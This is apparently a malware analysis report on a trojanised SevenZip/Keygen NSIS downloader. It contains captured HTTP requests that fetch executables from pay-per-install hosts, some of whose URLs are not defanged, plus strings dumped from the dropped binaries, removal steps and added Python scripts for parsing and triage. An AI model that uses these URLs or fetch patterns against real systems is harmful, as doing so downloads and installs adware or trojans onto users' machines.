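n2=setup-1228.exe
b2=ru
c2=sevenzip-2
s2=0
m2=1
d2=1500
t5=dl
u5=http://sub.spirlymo.com/installers/cli/1457017331461/SevenZip_downloader-Q0i7uvJmR.exe
n5=SevenZip_downloader-Q0i7uvJmR.exe
b5=bi
"""

if __name__ == "__main__":
    parsed = parse_launch_v5(SAMPLE_BODY)
    print("declared files=%s, parsed %d offers" % (parsed["declared"], len(parsed["offers"])))
    for offer in parsed["offers"]:
        print(offer["index"], offer["host"], offer["filename"], offer["nested_urls"])
    print("hosts:", collect_hosts(parsed))
```

Feeding the full captured response through collect_hosts() is the quickest way to turn one sandbox run into a blocklist, because the offer list names hosts (cloudfront.net distributions, pe-sixi.com, sweetcomet.com, spirlymo.com) that the sandboxed run itself never contacted.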
GET /stub_maker.php?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.ddownload6.club
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 66823
Connection: keep-alive
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="56d85d444db76.exe"
X-Powered-By: ASP.NET
Date: Thu, 03 Mar 2016 15:50:28 GMT
X-Cache: Miss from cloudfront
Via: 1.1 4cebe2fc1703437d8a79e556e38f6d7a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kkOHJ1rMp5xLPtBlyxOBJG6dkuaCfYE3W60SCcuSdgswJD9P7XIB0Q==
[66823-byte body: a PE executable (MZ header, "This program cannot be run in DOS mode" stub, PE signature, .text and .rdata section headers visible). Content-Disposition names it 56d85d444db76.exe; it is the file cached as Content.IE5\4DQJW9YN\56d85d444db76[1].exe and written to nsj2.tmp\whIkaR9Rme.exe, both MD5 1f9d4b5504148474f9e06590255a616e (see Dropped PE files). Raw dump omitted] <<< skipped >>>
POST hXXp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.afiledownload27.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=855&id[]=856&id[]=631&id[]=632&id[]=852&id[]=854
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Thu, 03 Mar 2016 15:50:53 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 73a3bce79e63d88b3a25c9ced0be16f5.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fcSbLmuhz8cR-i4lAtzvgkN_qhOhk-6z6GB45hgOyMYiGEYAYy_ADQ==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: fcSbLmuhz8cR-i4lAtzvgkN_qhOhk-6z6GB45hgOyMYiGEYAYy_ADQ==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>
GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 03 Mar 2016 15:50:52 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.afiledownload27.space/offer.php?affId=1006&trackingId=11717601&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02754-102fdbd3abcdce268f32d0cda9cb4a-1006-4-0-0-0-0-UA-0-3131-31323237-35353836393433-30-30-30-194.242.96.218-20160303105052-_-7F2D731E05743562753D171E4F1D3E55296362694B422706036B6771166C070C1B1F021E6C1412026D; expires=Sat, 02 Apr 2016 15:50:52 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Sun, 27 Jan 2019 02:30:52 GMT; path=/;
tracking_id: 102fdbd3abcdce268f32d0cda9cb4a
X-Robots-Tag: noindex, nofollow
Content-Length: 438
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="hXXp://up.afiledownload27.space/offer.php?affId=1006&trackingId=11717601&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a>.</p>
</body></html>
<<< skipped >>>
GET hXXp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=855&id[]=856&id[]=631&id[]=632&id[]=852&id[]=854 HTTP/1.1
Host: up.afiledownload27.space
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 449064
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 03 Mar 2016 15:50:42 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HuCadYZSIzWlvzDTFzMDMjZhsOtPGL2BsvIq4c9oQrq8NQsW9Vmiuw==
[449064-byte body: opaque binary data, not HTML despite the text/html Content-Type; raw dump omitted] <<< skipped >>>
POST hXXp://up.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=855&id[]=856&id[]=631&id[]=632&id[]=852&id[]=854
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Thu, 03 Mar 2016 15:50:53 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 5fc330730b7a22af558c1164ae769565.cloudfront.net (CloudFront)
X-Amz-Cf-Id: tNsNM1aNbcM0KoODe9kGS9m1N-HGAxAuhLVn_ggzeC6x7f3K76u3Lg==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: tNsNM1aNbcM0KoODe9kGS9m1N-HGAxAuhLVn_ggzeC6x7f3K76u3Lg==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>
GET hXXp://up.afiledownload27.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.afiledownload27.space
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Content-Length: 585
Connection: close
Location: hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 03 Mar 2016 15:50:40 GMT
X-Cache: Miss from cloudfront
Via: 1.1 f7cf1cf41b6eacdcf79cd9a0aa1d0179.cloudfront.net (CloudFront)
X-Amz-Cf-Id: xKvW7Y5wBHS4K6qQo8kFW5Tf9RcNfIDQBlfll2Men8pkGha0HDbWkA==
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a></body>
GET /?affId=1006&appTitle=Keygen&s1=1227&s2=5586943&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.slfdio83rh.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 152576
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="cpSetup.exe"
Date: Thu, 03 Mar 2016 15:50:38 GMT
X-Cache: Miss from cloudfront
Via: 1.1 b098e6f4643cebda4b3dc6797be9944c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gwXX0eQJ_CpFZMUooBBpCVGBpTa5ZjcC4-d1SxA9ULJwswCOnNPyEw==
[response body: 152576-byte PE executable ("MZ" header, "This program cannot be run in DOS mode", sections .text/.rdata); binary dump omitted] <<< skipped >>>
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj2.tmp\whIkaR9Rme.exe
zip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj2.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj2.tmp
p?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
.reloc
System.dll
callback%d
nsj2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj2.tmp\29ufGoaPqW
evenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen
l.ddownload6.club/stub_maker.php?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201603031547
hXXp://dl.ddownload6.club/stub_maker.php?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
%original file name%.exe_468_rwx_10004000_00001000:
callback%d
whIkaR9Rme.exe_564:
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
O8,reA
l;`]w`#r%s
7.rdata
KERNEL32.DLL
nsArray.dll
Join
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp\cpSetup.exe"
61/SevenZip_downloader-Q0i7uvJmR.exe
ducturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1227&subid2=5586943
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp\NSISdl.dll
1.1.1.6
Software\Microsoft\Windows\CurrentVersion\Internet Settings
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp
cpSetup.exe
Exec: success (""C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp\cpSetup.exe"")ISdl.dll"
up19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1227&subid2=5586943
Keygen Setup
1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp\182741632
461/SevenZip_downloader-Q0i7uvJmR.exe
oader-Q0i7uvJmR.exe
cli/1457017331461/SevenZip_downloader-Q0i7uvJmR.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj2.tmp\whIkaR9Rme.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj2.tmp
whIkaR9Rme.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
6776174
hXXp://get.slfdio83rh.xyz/?affId=1006&appTitle=Keygen&s1=1227&s2=5586943&setupName=cpSetup&appVersion=2.92&instId=11
9xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1227&subid2=5586943
nloader-Q0i7uvJmR.exe
hXXp://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1227&tid=5586943&b_typ=pe&n=S2V5Z2Vu&reb=1&ic=
whIkaR9Rme.exe_564_rwx_10001000_00007000:
.text
`.rdata
@.data
.rsrc
@.reloc
/key=
cpSetup.exe_380:
.text
`.rdata
@.data
.rsrc
@.reloc
.PexP
d.dEta$
.VsrG
.,%Ub
Ia.HpTP$InPerJetaxpHorAr
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
operator
GetProcessWindowStation
KERNEL32.dll
ole32.dll
GetProcessHeap
GetCPInfo
zcÁ
:::#222.111 )))
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
name='Microsoft.Windows.Common-Controls' version='6.0.0.0'
processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />
1 1$1(14181<1
Bmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp\cpSetup.exe
cpSetup.exe_380_rwx_003A0000_0000D000:
.text
`.rdata
@.data
.rsrc
@.reloc
/%C-^.
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTP
FirefoxURL
Firefox
ChromeHTML
Chrome
hXXp://
KERNEL32.dll
GetProcessHeap
:::#222.111 )))
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\cpSetup.exe (14751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\182741632 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\56d85d444db76[1].exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\whIkaR9Rme.exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\29ufGoaPqW (116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\launch_reb[1].htm (116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00081064.a (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0008169e.a (1730 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
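The file list above is the footprint of a two-stage NSIS downloader: each stage unpacks its plugins (NSISdl.dll, inetc.dll, System.dll, nsArray.dll) into its own Temp\ns*.tmp directory and drops the next executable beside them (cpSetup.exe in nst4.tmp, whIkaR9Rme.exe in nsj2.tmp). The script below is an added triage example, not part of the report or of Ad-Aware. It walks a Temp directory, reports every NSIS plugin directory with the plugins and executables (SHA-256) it holds, matches the executables against a set of known-bad hashes, and flags directories where a network plugin sits next to an executable. Assumptions: the ns<letter><hex>.tmp name pattern is inferred from the report's nsj2.tmp/nst4.tmp names, the plugin names come from its file list, and the directory tree it scans is constructed in the script (dummy contents), so the hashes are not the report's.

```python
"""Triage a user's Temp directory for the leftovers an NSIS downloader leaves
behind. Added example, not part of the report. The ns<letter><hex>.tmp pattern
is inferred from the report's nsj2.tmp/nst4.tmp names and the plugin DLL names
come from its file list; the demo tree below is constructed, not real samples."""
import hashlib
import re
import tempfile
from pathlib import Path

NSIS_DIR_RE = re.compile(r"^ns[a-z][0-9a-f]{1,4}\.tmp$", re.IGNORECASE)
NETWORK_PLUGINS = {"nsisdl.dll", "inetc.dll"}   # NSIS plugins that fetch from the network
OTHER_PLUGINS = {"system.dll", "nsarray.dll"}

def sha256_of(path):
    """Hash a file in chunks so large droppers do not have to fit in memory."""
    digest = hashlib.sha256()
    with Path(path).open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def scan_temp(temp_root, known_hashes=frozenset()):
    """One finding per NSIS temp dir: plugins present, executables with their
    SHA-256, matches against known-bad hashes, and a 'suspicious' flag when a
    network plugin sits next to an executable (the downloader-dropper layout)."""
    findings = []
    for entry in sorted(Path(temp_root).iterdir()):
        if not (entry.is_dir() and NSIS_DIR_RE.match(entry.name)):
            continue
        files = [p for p in entry.iterdir() if p.is_file()]
        names = {p.name.lower() for p in files}
        hashes = {p.name: sha256_of(p) for p in files if p.suffix.lower() == ".exe"}
        net = sorted(names & NETWORK_PLUGINS)
        findings.append({
            "dir": entry.name,
            "network_plugins": net,
            "other_plugins": sorted(names & OTHER_PLUGINS),
            "executables": hashes,
            "known_bad": sorted(n for n, h in hashes.items() if h in known_hashes),
            "suspicious": bool(net) and bool(hashes),
        })
    return findings

def build_demo_tree(root):
    """Constructed layout mirroring the report's file list; contents are dummies."""
    root = Path(root)
    layout = {
        "nst4.tmp": ["NSISdl.dll", "cpSetup.exe", "nsArray.dll", "182741632"],
        "nsj2.tmp": ["whIkaR9Rme.exe", "inetc.dll", "System.dll", "29ufGoaPqW"],
        "unrelated.tmp": ["notes.txt"],   # must not be reported
    }
    for dirname, filenames in layout.items():
        (root / dirname).mkdir()
        for name in filenames:
            data = name.encode()
            if name.lower().endswith(".exe"):
                data = b"MZ" + data   # give the dummy executables a PE-looking start
            (root / dirname / name).write_bytes(data)
    return root

def demo():
    """Build the tree, treat the dummy cpSetup.exe as known-bad, scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        known = {sha256_of(Path(tmp, "nst4.tmp", "cpSetup.exe"))}
        return scan_temp(tmp, known_hashes=known)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a live host you would call scan_temp(os.environ["TEMP"], known_hashes=...) with the SHA-256 values from a report such as this one; the "suspicious" flag is a heuristic for triage, not a verdict, since legitimate NSIS installers leave the same directories behind while they run.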